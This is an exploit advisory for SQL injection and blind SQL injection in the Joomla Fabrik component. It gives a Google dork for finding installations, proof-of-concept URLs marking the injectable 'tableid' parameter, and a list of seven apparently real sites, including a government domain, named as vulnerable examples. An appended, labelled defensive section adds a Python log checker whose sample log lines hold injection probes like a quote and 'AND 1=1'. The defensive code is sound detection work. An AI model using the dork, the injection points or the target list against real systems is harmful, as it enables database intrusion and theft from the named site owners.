[*] Exploit Title : Joomla Fabrik Vulnerabilities - SQLi and Blind SQLi
[*] Exploit Author : Dark23
[*] Version : 1.5
[*] Tested on : Windows and Linux
[*] Google dork : [inurl:index.php?option=com_fabrik]
-------------------------------
# ~ Exploitation ~ #
-------------------------------
Concept :
SQL injection is a method of injecting arbitrary code that exploits a vulnerability in an application's input validation in order to query a database.
The vulnerability originates in the incorrect checking and/or filtering of the variables used in a program that contains.
Variable : tableid
http://www.target.com/index.php?option=com_fabrik&view=table&tableid=[SQL Blind]&calculations=98&Itemid=75
PoC - SQLi.
Variable : tableid
http://www.target.com/index.php?option=com_fabrik&view=table&tableid=[SQL Blind]&calculations=5&resetfilters=10&Itemid=94&lang=es
Example:
[*] http://feceminte.cat/index.php?option=com_fabrik&view=table&tableid=4&calculations=0&Itemid=159&lang=es&act1=1
[*] http://osaarchivum.org/index.php?option=com_fabrik&view=table&tableid=5&calculations=0&Itemid=1520&lang=en&limitstart5=450
[*] http://www.alcaniz.es/index.php?option=com_fabrik&view=table&tableid=8&calculations=0&resetfilters=0&Itemid=466
[*] http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85
[*] http://www.ipse.gov.co/ipseactual2013/index.php?option=com_fabrik&view=table&tableid=6&calculations=0&resetfilters=0&Itemid=96&lang=es
[*] http://healthcare-resourcesgroup.com/index.php?option=com_fabrik&view=table&tableid=13&calculations=0&resetfilters=0&Itemid=267&limitstart13=20
[*] http://www.statmedicalsearch.com/index.php?option=com_fabrik&view=table&tableid=13&calculations=0&resetfilters=0&fabriklayout=default&Itemid=273&&limitstart13=40
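
Added example (not part of the original advisory and not Fabrik's own code): a log check for the parameter named above, flagging com_fabrik requests whose tableid is anything other than a plain integer. The same allow-list test is what a server-side filter for tableid should enforce. The log lines, addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs and values are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2014:10:01:02 +0000] "GET /index.php?option=com_fabrik&view=table&tableid=4&calculations=0&Itemid=75 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Mar/2014:10:01:07 +0000] "GET /index.php?option=com_fabrik&view=table&tableid=4%27&calculations=98&Itemid=75 HTTP/1.1" 500 312
203.0.113.9 - - [10/Mar/2014:10:01:09 +0000] "GET /index.php?option=com_fabrik&view=table&tableid=4+AND+1%3D1&calculations=98&Itemid=75 HTTP/1.1" 200 5120
198.51.100.7 - - [10/Mar/2014:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 900
198.51.100.7 - - [10/Mar/2014:10:02:05 +0000] "GET /index.php?view=table&tableid=&option=com_fabrik HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def is_valid_tableid(value):
    """Allow-list check: a legitimate tableid is 1-10 ASCII digits, nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def suspicious_requests(log_text):
    """Return (client_ip, status, decoded tableid) for every com_fabrik
    request whose tableid fails the integer allow-list."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        # parse_qs URL-decodes values; keep_blank_values keeps "tableid=" visible.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_fabrik" not in params.get("option", []):
            continue
        for value in params.get("tableid", []):
            if not is_valid_tableid(value):
                hits.append((ip, int(status), value))
    return hits


if __name__ == "__main__":
    for ip, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} tableid={value!r}")
```

A 500 response next to a rejected value suggests the input reached the database layer unfiltered, so those entries deserve review first.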